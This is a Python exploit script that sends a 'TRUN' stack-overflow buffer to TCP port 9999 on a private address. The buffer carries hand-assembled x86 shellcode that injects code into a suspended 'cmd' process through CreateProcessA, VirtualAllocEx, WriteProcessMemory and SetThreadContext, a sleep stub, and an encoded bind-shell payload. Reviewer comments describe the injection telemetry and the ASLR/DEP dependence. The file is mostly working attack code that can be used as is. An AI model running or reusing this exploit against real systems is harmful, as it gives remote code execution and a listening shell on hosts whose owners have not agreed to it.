  1. #!/usr/bin/python
  2. import socket
  3. import sys
  4.  
  # Stage-1 machine code (32-bit x86), annotated per instruction. Through
  # hard-coded absolute addresses it calls, in order, CreateProcessA,
  # VirtualAllocEx, WriteProcessMemory, GetThreadContext, SetThreadContext,
  # ResumeThread and ExitProcess (API names as given in the author's comments).
  # Defender's view: a child created suspended, a PAGE_EXECUTE_READWRITE
  # allocation in it, a cross-process write and a thread-context change before
  # the resume are the API sequence that endpoint telemetry flags as process
  # injection.
  # NOTE(review): the 0x77xxxxxx call targets are constants, so they match only
  # one particular set of loaded DLL images; ASLR changes them.
  5. payload="\xBA\x73\x7D\x74\x10" #MOV EDX,0x10747D73
  6. payload+="\x81\xEA\x10\x10\x10\x10" #SUB EDX,0x10101010 -> EDX=0x00646D63, the bytes "cmd\0"
  7. payload+="\x52" #PUSH EDX
  8. payload+="\x8B\xDC" #MOV EBX,ESP (EBX -> "cmd")
  9. payload+="\x33\xC9"#XOR ECX,ECX
  10. payload+="\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51" #PUSH ECX x17 (68 zero bytes on the stack)
  11. payload+="\x8B\xF4"#MOV ESI,ESP
  12. payload+="\x8B\xFE"#MOV EDI,ESI
  13. payload+="\x83\xC7\x04" #ADD EDI,4
  14. payload+="\x57" #PUSH EDI (lpProcessInformation)
  15. payload+="\x56" #PUSH ESI (lpStartupInfo)
  16. payload+="\x51\x51" #push ecx x2 (two NULL arguments)
  17. payload+="\xB9\x05\x01\x01\x09" #mov ecx,0x09010105
  18. payload+="\x81\xE9\x01\x01\x01\x01" #sub ecx,0x01010101 -> 0x08000004 = CREATE_NO_WINDOW|CREATE_SUSPENDED
  19. payload+="\x51" #PUSH ecx (dwCreationFlags)
  20. payload+="\x33\xC9" #XOR ECX,ECX
  21. payload+="\x51" #PUSH ecx
  22. payload+="\x51" #PUSH ecx
  23. payload+="\x51" #PUSH ecx
  24. #payload+="\x51" #PUSH ecx
  25. payload+="\x53" #PUSH ebx (lpCommandLine -> "cmd")
  26. payload+="\x51" #PUSH ecx (lpApplicationName = NULL)
  27. payload+="\xBB\x82\x20\xDE\x77" #MOV EBX,CreateProcessA
  28. payload+="\xff\xd3" #Call EBX
  29.  
  30. payload+="\x5E" #pop esi
  31. payload+="\x5E" #pop esi store (overwrites the previous pop; presumably hProcess - confirm)
  32. payload+="\x5f" #pop edi (presumably hThread - confirm)
  33. payload+="\x6A\x40" #PUSH 40 flProtect PAGE_EXECUTE_READWRITE
  34. payload+="\x33\xC9" #XOR ECX,ECX
  35. payload+="\xb5\x30" #MOV CH,30 -> ECX=0x3000 (MEM_COMMIT|MEM_RESERVE)
  36. payload+="\x51" #PUSH ECX flAllocationType
  37. payload+="\xb5\x01" #MOV CH,01
  38. payload+="\xb1\xf4" #MOV CL,0F4 -> ECX=0x1F4 (500)
  39. payload+="\x51" #PUSH ECX (dwSize)
  40. payload+="\x33\xC9" #XOR ECX,ECX
  41. payload+="\x51" #PUSH ECX (lpAddress = NULL)
  42. payload+="\x56" #PUSH ESI
  43. payload+="\xBB\xB6\xc1\xe1\x77"#MOV EBX,kernel32.VirtualAllocEx
  44. payload+="\xff\xd3" #Call EBX
  45. payload+="\x8B\xE8" #MOV EBP,EAX (keep the returned address)
  46.  
  47. payload+="\x33\xdb" #XOR EBX,EBX
  48. payload+="\x53"#PUSH EBX (lpNumberOfBytesWritten = NULL)
  49. payload+="\xb7\x01"#MOV BH,1
  50. payload+="\xb3\xf4"#MOV bl,0f4 -> EBX=0x1F4
  51. payload+="\x53" #PUSH EBX (nSize)
  52. payload+="\x8b\xdc"#mov EBX,ESP
  53. payload+="\x66\x81\xC3\x74\x02" #ADD BX,274
  54. payload+="\x53" #PUSH EBX (lpBuffer)
  55. payload+="\x50" #PUSH EAX (lpBaseAddress)
  56. payload+="\x56" #PUSH ESI
  57. payload+="\xBB\xde\xC1\xe1\x77" #MOV EBX,kernel32.WriteProcessMemory
  58. payload+="\xff\xd3" #Call EBX
  59.  
  60. payload+="\x8b\xdc"#MOV EBX,ESP
  61. payload+="\x66\x81\xEB\x50\x01" #SUB BX,150
  62. payload+="\x33\xc9" #XOR ECX,ECX
  63. payload+="\x66\xB9\xff\xff"#MOV CX,0xffff
  64. payload+="\x41" #inc ecx
  65. payload+="\x41" #inc ecx -> ECX=0x00010001 (CONTEXT_CONTROL on x86)
  66. payload+="\x89\x0B"#MOV DWORD[EBX],ECX (ContextFlags)
  67. payload+="\x53"#PUSH EBX (opcode 0x53 is EBX, not ECX; lpContext)
  68. payload+="\x57"#PUSH EDI
  69. payload+="\xB9\xC1\x0C\xE4\x77"#MOV ECX,kernel32.GetThreadContext
  70. payload+="\xff\xd1" #Call ECX
  71.  
  72. payload+="\x8b\xcb"#MOV ECX,EbX
  73. payload+="\x80\xc1\xb8" #ADD CL,0xb8
  74. payload+="\x80\xc5\x01" #ADD CH,0x1
  75. payload+="\x89\x29" #MOV DWORD [ECX],EBP (stores the allocated address into the context buffer; NOTE(review): presumably the saved instruction pointer - confirm the offset)
  76. payload+="\x53" #PUSH EBX (opcode 0x53 is EBX, not EDX; lpContext)
  77. payload+="\x57" #PUSH EDI
  78. payload+="\xbb\x93\x01\xe7\x77" #mov ebx,kernel32.SetThreadContext
  79. payload+="\xff\xd3" #Call EBX
  80.  
  81. payload+="\x57" #PUSH EDI
  82. payload+="\xbb\x1c\x0f\xe2\x77"#MOV EBX,kernel32.ResumeThread
  83. payload+="\xff\xd3" #Call EBX
  84.  
  85. payload+="\x33\xc9" #XOR ECX,ECX
  86. payload+="\x51" #PUSH ECX (exit code 0)
  87. payload+="\xBB\x4f\x21\xe3\x77" #mov ebx,kernel32.ExitProcess
  88. payload+="\xff\xd3" #Call EBX
  89.  
  # Second code fragment: pushes 0x1388 and calls the address the author labels
  # kernel32.Sleep, i.e. a 5000 ms delay. Like the stage-1 code it uses a
  # hard-coded absolute call target.
  90. sleep=""
  91. sleep+="\x33\xc9" #XOR ECX,ECX
  92. sleep+="\xB1\x88" #MOV CL,88
  93. sleep+="\xB5\x13" #MOV CH,13 -> ECX=0x1388 (5000)
  94. sleep+="\x51" #PUSH ECX (dwMilliseconds)
  95. sleep+="\xbb\x46\xba\xe2\x77" #MOV EBX,kernel32.Sleep
  96. sleep+="\xff\xd3" #Call EBX
  97.  
  # Opaque byte blob; the variable name says bind shell, and nothing in this
  # file decodes or describes it further.
  # NOTE(review): the leading bytes (\xd9\x74\x24\xf4 = FNSTENV [ESP-0xC],
  # followed by a keyed XOR loop) are consistent with a self-decoding stub, so
  # the real instructions are not readable from these bytes - contents
  # unverified.
  98. bind_shell=("\xda\xc2\xd9\x74\x24\xf4\xbd\x90\xac\x38\xd9\x58\x29\xc9\xb1"
  99. "\x53\x31\x68\x17\x83\xc0\x04\x03\xf8\xbf\xda\x2c\x04\x57\x98"
  100. "\xcf\xf4\xa8\xfd\x46\x11\x99\x3d\x3c\x52\x8a\x8d\x36\x36\x27"
  101. "\x65\x1a\xa2\xbc\x0b\xb3\xc5\x75\xa1\xe5\xe8\x86\x9a\xd6\x6b"
  102. "\x05\xe1\x0a\x4b\x34\x2a\x5f\x8a\x71\x57\x92\xde\x2a\x13\x01"
  103. "\xce\x5f\x69\x9a\x65\x13\x7f\x9a\x9a\xe4\x7e\x8b\x0d\x7e\xd9"
  104. "\x0b\xac\x53\x51\x02\xb6\xb0\x5c\xdc\x4d\x02\x2a\xdf\x87\x5a"
  105. "\xd3\x4c\xe6\x52\x26\x8c\x2f\x54\xd9\xfb\x59\xa6\x64\xfc\x9e"
  106. "\xd4\xb2\x89\x04\x7e\x30\x29\xe0\x7e\x95\xac\x63\x8c\x52\xba"
  107. "\x2b\x91\x65\x6f\x40\xad\xee\x8e\x86\x27\xb4\xb4\x02\x63\x6e"
  108. "\xd4\x13\xc9\xc1\xe9\x43\xb2\xbe\x4f\x08\x5f\xaa\xfd\x53\x08"
  109. "\x1f\xcc\x6b\xc8\x37\x47\x18\xfa\x98\xf3\xb6\xb6\x51\xda\x41"
  110. "\xb8\x4b\x9a\xdd\x47\x74\xdb\xf4\x83\x20\x8b\x6e\x25\x49\x40"
  111. "\x6e\xca\x9c\xfd\x66\x6d\x4f\xe0\x8b\xcd\x3f\xa4\x23\xa6\x55"
  112. "\x2b\x1c\xd6\x55\xe1\x35\x7f\xa8\x0a\x1e\x8f\x25\xec\x0a\x9f"
  113. "\x63\xa6\xa2\x5d\x50\x7f\x55\x9d\xb2\xd7\xf1\xd6\xd4\xe0\xfe"
  114. "\xe6\xf2\x46\x68\x6d\x11\x53\x89\x72\x3c\xf3\xde\xe5\xca\x92"
  115. "\xad\x94\xcb\xbe\x45\x34\x59\x25\x95\x33\x42\xf2\xc2\x14\xb4"
  116. "\x0b\x86\x88\xef\xa5\xb4\x50\x69\x8d\x7c\x8f\x4a\x10\x7d\x42"
  117. "\xf6\x36\x6d\x9a\xf7\x72\xd9\x72\xae\x2c\xb7\x34\x18\x9f\x61"
  118. "\xef\xf7\x49\xe5\x76\x34\x4a\x73\x77\x11\x3c\x9b\xc6\xcc\x79"
  119. "\xa4\xe7\x98\x8d\xdd\x15\x39\x71\x34\x9e\x49\x38\x14\xb7\xc1"
  120. "\xe5\xcd\x85\x8f\x15\x38\xc9\xa9\x95\xc8\xb2\x4d\x85\xb9\xb7"
  121. "\x0a\x01\x52\xca\x03\xe4\x54\x79\x23\x2d")
  122.  
  # Buffer layout, in order: 2003 filler bytes, the 4 bytes "\xaf\x11\x50\x62"
  # (0x625011AF little-endian, per the trailing comment), payload, "C" padding,
  # 100 x 0x90, sleep, 10 x 0x90, bind_shell.
  # NOTE(review): the layout depends on a fixed address and, it appears, on
  # executing bytes from the overflowed buffer - confirm; ASLR and DEP on the
  # target binary are the mitigations to verify against it.
  123. shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + payload + "C"*(2500-len(payload)-4-2003-10)+"\x90"*100+sleep+"\x90"*10+bind_shell #625011af
  124.  
  # Sends the buffer once, prefixed with "TRUN /.:/", to TCP port 9999 on
  # 172.16.12.204 (an RFC 1918 private address) and closes the socket without
  # reading a reply.
  125. try:
  126. s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  127. connect=s.connect((‘172.16.12.204’,9999))
  128. s.send((‘TRUN /.:/’+shellcode))
  129. print("Fuzzing with TRUN comamnd with %s bytes"% str(len(shellcode))) # message says "Fuzzing" although the buffer sent is the assembled string above
  130. s.close()
  131. except: # bare except: any failure in the block, not only a connection error, prints the message below
  132. print("Error connecting to server")
  133. sys.exit()